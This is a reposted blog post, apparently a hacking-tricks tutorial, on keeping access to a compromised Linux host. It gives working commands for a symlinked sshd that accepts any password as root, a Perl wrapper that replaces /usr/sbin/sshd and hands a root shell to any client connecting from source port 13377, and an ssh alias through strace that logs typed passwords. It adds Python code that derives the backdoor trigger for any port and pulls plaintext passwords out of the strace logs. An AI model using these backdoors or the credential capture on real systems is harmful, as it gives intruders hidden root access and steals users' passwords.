z0nek


1. You have a shell on the target after the intrusion, its firewall does not filter inbound connections, and you want to open a reachable SSH port fast.
Tested on Kali. Root privileges are required.
root@kali-vincent:~# ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=31337

ssh root@172.16.100.128 -p 31337
Type any password.

Why the symlink has to be named su: sshd passes its own program name (argv[0]) to PAM as the service name, so this instance authenticates against /etc/pam.d/su instead of /etc/pam.d/sshd. That file normally begins with "auth sufficient pam_rootok.so", and because the daemon was started by root (uid 0) that module succeeds and ends the auth stack before the password is ever looked at. The trick therefore depends on a PAM-enabled sshd (UsePAM yes) built with the default PAM service name rather than a fixed one (OpenSSH's --with-pam-service configure option), on password logins being allowed for the account you use (PermitRootLogin yes for root), and on /etc/pam.d/su actually carrying that pam_rootok line.
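An added example (mine, not the original article's) that checks the precondition this trick stands on: it parses a PAM service file and reports whether its auth stack is ended early by pam_rootok.so, and which required/requisite modules would still run before it. The sample /etc/pam.d/su contents are constructed to look like a Debian-family default and are an assumption, not copied from any host on the page.

```python
import re

# Constructed sample in the shape of a Debian-family /etc/pam.d/su (an assumption,
# not copied from any host on the page): the first auth line is what the trick relies on.
SAMPLE_PAM_SU = """\
# The PAM configuration file for the Shadow `su' service
auth       sufficient pam_rootok.so
session    required   pam_env.so readenv=1
@include common-auth
@include common-account
@include common-session
"""

# The same service with the root shortcut removed: every caller, uid 0 included,
# has to satisfy pam_unix.
HARDENED_PAM_SU = """\
auth       required   pam_unix.so
@include common-account
"""

def parse_pam_lines(text):
    """Yield (type, control, module) for each effective entry of a pam.d file.
    Skips comments and blank lines, joins backslash continuations, accepts the
    bracketed [success=... default=...] control syntax, and reports Debian's
    @include lines as ('include', None, service)."""
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("@include"):
            yield ("include", None, line.split(None, 1)[1])
            continue
        fields = line.split()
        ptype = fields[0].lstrip("-").lower()          # a leading '-' only silences logging
        if fields[1].startswith("["):
            end = line.index("]")
            control = line[line.index("["):end + 1].lower()
            module = line[end + 1:].split()[0]
        else:
            control, module = fields[1].lower(), fields[2]
        yield (ptype, control, module)

def stack_ends_on_success(control):
    """'sufficient', and a bracket control with success=done, both stop the stack
    with success as soon as the module returns PAM_SUCCESS."""
    return control == "sufficient" or "success=done" in control

def pam_service_trusts_root(text):
    """Return (trusts_root, preceding_required).

    trusts_root is True when the auth phase contains pam_rootok.so under a control
    that ends the stack on success. A daemon started by root keeps uid 0, so for it
    that single line satisfies authentication for any password. preceding_required
    lists required/requisite auth modules that run before it and still have to pass
    (a prior required failure keeps the later sufficient success from ending the
    stack with success)."""
    preceding = []
    for ptype, control, module in parse_pam_lines(text):
        if ptype != "auth":
            continue
        if module.rsplit("/", 1)[-1] == "pam_rootok.so" and stack_ends_on_success(control):
            return True, preceding
        if control in ("required", "requisite"):
            preceding.append(module)
    return False, preceding

if __name__ == "__main__":
    print(pam_service_trusts_root(SAMPLE_PAM_SU))    # (True, [])
    print(pam_service_trusts_root(HARDENED_PAM_SU))  # (False, ['pam_unix.so'])
```

Run it against the real /etc/pam.d/su of a box (and against whatever service name the renamed sshd will present) before relying on the trick; a host whose su stack starts with a required pam_unix.so line will just reject the arbitrary password.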

2. Build an SSH wrapper backdoor. This is better than the first trick: it opens no extra port, and as long as the target runs an SSH service you can get in remotely.
It works because OpenSSH's sshd re-executes itself for every accepted connection, with the connected socket on stdin/stdout, and it re-executes the path found in its own argv[0]. The wrapper below replaces /usr/sbin/sshd with a Perl script that, on each run, calls getpeername() on stdin: if the peer's sockaddr matches /^..4A/ it execs /bin/sh on the socket, otherwise it hands over to the real sshd (moved to /usr/bin/sshd) while keeping "/usr/sbin/sshd" as argv[0], so the next re-exec goes through the wrapper again. In a struct sockaddr_in the two bytes after the address family are the port in network byte order, so "4A" (0x34 0x41) means source port 13377; the family and the client address are not checked at all.
Run on the compromised host:

[root@localhost ~]# cd /usr/sbin
[root@localhost sbin]# mv sshd ../bin
[root@localhost sbin]# echo '#!/usr/bin/perl'>sshd
[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);'>>sshd
[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,'>>sshd
[root@localhost sbin]# chmod u+x sshd
[root@localhost sbin]# /etc/init.d/sshd restart

On your own machine, connect with source port 13377:
socat STDIO TCP4:10.18.180.20:22,sourceport=13377

[root@vincenthostname socat-1.4]# ./socat STDIO TCP4:172.16.100.128:22,sourceport=13377

whoami
root

The shell is not attached to a pty, so it prints no prompt; type a command and read the output.
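As an added example (not from the original article), here is the wrapper's trigger condition worked through in Python: it builds the sockaddr that getpeername() returns for a given client, derives the /^..XX/ pattern for any chosen port instead of the hard-coded 4A, and shows what the check does and does not look at. The addresses are constructed, the struct layouts are those of little-endian Linux (x86/ARM), and the IPv6 case goes beyond the article's TCP4 run to show why the client has to use IPv4.

```python
import re
import socket
import struct

AF_INET, AF_INET6 = 2, 10   # Linux values; packed little-endian as on x86/ARM

def sockaddr_in(ip, port):
    """struct sockaddr_in as Linux getpeername() fills it: sin_family (2 bytes,
    host order), sin_port (2 bytes, network order), sin_addr (4), 8 bytes padding."""
    return (struct.pack("<H", AF_INET)
            + struct.pack("!H", port)
            + socket.inet_aton(ip)
            + b"\x00" * 8)

def sockaddr_in6(ip6, port):
    """struct sockaddr_in6: family, port, flowinfo, 16-byte address, scope id.
    The port sits at the same offset (2) as in sockaddr_in."""
    return (struct.pack("<H", AF_INET6)
            + struct.pack("!H", port)
            + struct.pack("!I", 0)
            + socket.inet_pton(socket.AF_INET6, ip6)
            + struct.pack("<I", 0))

def wrapper_pattern(port):
    """The regex the wrapper hard-codes as /^..4A/, generated for any port: two
    wildcard bytes (the family is never compared) followed by the port in network
    byte order. Like Perl's '.', Python's '.' does not match 0x0a by default.
    re.escape keeps ports whose bytes are regex metacharacters (0x2e '.', 0x2a '*')
    as literals, something the one-liner would also have to take care of."""
    return re.compile(rb"^.." + re.escape(struct.pack("!H", port)))

def wrapper_triggers(peer_sockaddr, port=13377):
    """True when the Perl wrapper would exec /bin/sh for this peer."""
    return wrapper_pattern(port).match(peer_sockaddr) is not None

def port_from_pattern_bytes(two_bytes):
    """Inverse: which source port a literal such as b'4A' selects."""
    return struct.unpack("!H", two_bytes)[0]

if __name__ == "__main__":
    print(port_from_pattern_bytes(b"4A"))                          # 13377
    print(wrapper_triggers(sockaddr_in("172.16.100.128", 13377)))  # True
    print(wrapper_triggers(sockaddr_in("172.16.100.128", 22)))     # False
    # AF_INET6 is 10 = 0x0a, a newline byte, which the '.' wildcard refuses to
    # match, so an IPv6 peer can never trigger the backdoor:
    print(wrapper_triggers(sockaddr_in6("fe80::1", 13377)))        # False
```

Two things fall out of this: any client on the Internet that happens to use source port 13377 gets a root shell, since the address is never compared, and the check is IPv4-only by accident of the 0x0a family byte rather than by design.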

3. Log the passwords typed into the SSH client

On the compromised account, wrap the user's ssh in strace (put the alias in ~/.bashrc or a similar startup file so it survives new shells):

[test@CentOS tmp]$ alias ssh='strace -o /tmp/sshpwd.log -e read,write,connect -s2048 ssh'

Everything the client reads from the terminal ends up in the log. In this run fd 4 was the tty, and the reads show the user typing yes (the answer to a host-key prompt), then the password hehe, then exit inside the session:

[test@CentOS tmp]$ grep "read(4" /tmp/sshpwd.log
read(4, "y", 1) = 1
read(4, "e", 1) = 1
read(4, "s", 1) = 1
read(4, "\n", 1) = 1
read(4, "h", 1) = 1
read(4, "e", 1) = 1
read(4, "h", 1) = 1
read(4, "e", 1) = 1
read(4, "\n", 1) = 1
read(4, "e", 16384) = 1
read(4, "x", 16384) = 1
read(4, "i", 16384) = 1
read(4, "t", 16384) = 1
read(4, "\r", 16384) = 1

The descriptor number is not fixed: if the grep comes back empty, add open/openat to the -e list and look for the open of /dev/tty to see which fd it got. Also note that strace -o truncates the file, so each new ssh invocation overwrites the previous capture.
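An added example (not part of the article): a Python parser that turns the strace output into the lines the user actually submitted, decoding strace's C-style escapes and applying Backspace/DEL the way the terminal did. The sample log is constructed from the reads above, plus one connect line the filter has to ignore and one Backspace to exercise the correction path.

```python
import ast
import re

# Constructed sample log (not the article's file): the reads shown above, plus one
# connect line the filter must skip and one Backspace (DEL, \177) to exercise the
# correction logic. fd 4 is the client's /dev/tty in this run.
SAMPLE_LOG = r'''
connect(3, {sa_family=AF_INET, sin_port=htons(22), sin_addr=inet_addr("172.16.100.128")}, 16) = 0
read(4, "y", 1) = 1
read(4, "e", 1) = 1
read(4, "s", 1) = 1
read(4, "\n", 1) = 1
read(4, "h", 1) = 1
read(4, "e", 1) = 1
read(4, "h", 1) = 1
read(4, "e", 1) = 1
read(4, "\n", 1) = 1
read(4, "e", 16384) = 1
read(4, "x", 16384) = 1
read(4, "i", 16384) = 1
read(4, "y", 16384) = 1
read(4, "\177", 16384) = 1
read(4, "t", 16384) = 1
read(4, "\r", 16384) = 1
'''

# read(FD, "ESCAPED"[...], COUNT) = RESULT   (strace appends ... when -s truncates)
READ_RE = re.compile(r'^read\((\d+),\s*"((?:[^"\\]|\\.)*)"(?:\.\.\.)?,\s*\d+\)\s*=\s*(-?\d+)')

def decode_strace_string(escaped):
    """strace prints buffers as C string literals (\\n, \\r, \\177, \\x7f, \\", \\\\);
    Python's bytes-literal grammar understands the same escapes."""
    return ast.literal_eval('b"' + escaped + '"')

def keystrokes(log_text, fd=4):
    """Concatenate, in order, every byte the traced ssh read from the given fd.
    Lines for other fds, other syscalls, or failed reads (result <= 0) are skipped."""
    out = bytearray()
    for line in log_text.splitlines():
        m = READ_RE.match(line)
        if m and int(m.group(1)) == fd and int(m.group(3)) > 0:
            out += decode_strace_string(m.group(2))
    return bytes(out)

def typed_lines(raw):
    """Split the keystroke stream into the lines the user submitted, applying
    Backspace (0x08) and DEL (0x7f) the way the terminal driver did. Enter shows
    up as \\n while the local tty is in cooked mode (ICRNL turns CR into NL, as
    during the password prompt) and as \\r once ssh has switched the tty to raw
    mode for the remote session."""
    lines, cur = [], bytearray()
    for b in raw:
        if b in (0x08, 0x7f):
            if cur:
                cur.pop()
        elif b in (0x0a, 0x0d):
            lines.append(cur.decode("latin-1"))
            cur = bytearray()
        else:
            cur.append(b)
    if cur:
        lines.append(cur.decode("latin-1"))
    return lines

if __name__ == "__main__":
    print(typed_lines(keystrokes(SAMPLE_LOG)))   # ['yes', 'hehe', 'exit']
```

The second line of the result is the password; the 1-byte reads versus the 16384-byte reads in the log are the easiest way to tell the local password prompt apart from the interactive session that follows it.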

Reposted from: https://www.91ri.org/9255.html


Tags: tricks

© z0nek | Powered by LOFTER